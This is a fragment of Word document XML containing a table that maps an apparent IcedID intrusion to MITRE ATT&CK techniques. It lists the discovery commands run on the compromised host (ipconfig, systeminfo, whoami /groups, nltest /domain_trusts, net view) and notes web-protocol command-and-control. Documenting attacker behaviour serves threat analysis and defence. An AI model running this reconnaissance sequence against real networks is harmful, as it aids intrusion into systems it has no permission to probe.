            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BC46877" w14:textId="77777777" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="00ED766B" w:rsidP="006474F5">
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>IcedID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve"> ran initial discovery after being executed on the beachhead</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3724AE" w14:textId="15209E3F" w:rsidR="00ED766B" w:rsidRPr="004A56C2" w:rsidRDefault="00ED766B" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:t>ipconfig /all</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="2851D73D" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12D8A2A7" w14:textId="5C3A7214" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BE4A647" w14:textId="21EC3409" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>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2DCBC1D1" w14:textId="29F86023" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1082 System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CD74876" w14:textId="4F540002" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A03D964" w14:textId="77777777" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30B7BB5A" w14:textId="61B3010E" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="139B465D" w14:textId="26DD3DE8" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46E70905" w14:textId="275D7394" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="00ED766B" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>systeminfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="0652A9CD" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4360BC18" w14:textId="68301350" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="711CBE2E" w14:textId="7D950619" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>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76B8E644" w14:textId="72CC8372" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1033 System Owner/User Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E66ACC6" w14:textId="64911F25" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33FEFB53" w14:textId="77777777" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57FC7F5C" w14:textId="2B3C6C40" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CAECEF5" w14:textId="109CAF5F" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29463B03" w14:textId="075BC3E3" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="00ED766B" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve"> /groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="627BC295" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24D84E75" w14:textId="219E74F4" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1946B20D" w14:textId="5917DC33" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>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48296481" w14:textId="02AE9319" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1482 Domain Trust Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77018326" w14:textId="6B38EE8B" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1011444A" w14:textId="77777777" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01758B8D" w14:textId="481197E2" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15774A56" w14:textId="66008AEE" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6B7BDE" w14:textId="42EE319D" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="00ED766B" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>nltest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t>domain_trusts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A56C2" w:rsidRPr="004A56C2" w14:paraId="3D7B50DA" w14:textId="77777777" w:rsidTr="006474F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED6ED12" w14:textId="3DBF4329" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06518BC2" w14:textId="036778C2" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>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016B3825" w14:textId="4883E552" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1135 Network Share Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09558C6E" w14:textId="43C5D89F" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31F91927" w14:textId="77777777" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C46AD32" w14:textId="65FCA1A0" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E6F25F3" w14:textId="3DDEA7E0" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="006474F5" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="090FC814" w14:textId="7E42170C" w:rsidR="006474F5" w:rsidRPr="004A56C2" w:rsidRDefault="00ED766B" w:rsidP="006474F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:t>net view /all /domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896EEF" w:rsidRPr="004A56C2" w14:paraId="30EB9D08" w14:textId="77777777" w:rsidTr="006351CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0072BF4D" w14:textId="618077DB" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D219668" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C93FEC8" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol : Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74A20C47" w14:textId="72063E85" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="0001622D" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="595" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07BE06E4" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="201B1F7D" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B93BCE6" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DC2B01F" w14:textId="5508D3C8" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:t>See below (example beaconing)</w:t>
            </w:r>
            <w:r w:rsidR="00543758">
              <w:t>. See also [2] snippet from C2 Network Communication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896EEF" w:rsidRPr="004A56C2" w14:paraId="1BF9A3CD" w14:textId="77777777" w:rsidTr="006351CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F41AD7" w14:textId="33990D44" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="0001622D" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00896EEF" w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1281" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04B68945" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69BCC367" w14:textId="77777777" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="00896EEF" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A56C2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol : Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09A12E1F" w14:textId="749956B2" w:rsidR="00896EEF" w:rsidRPr="004A56C2" w:rsidRDefault="0001622D" w:rsidP="006351CD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
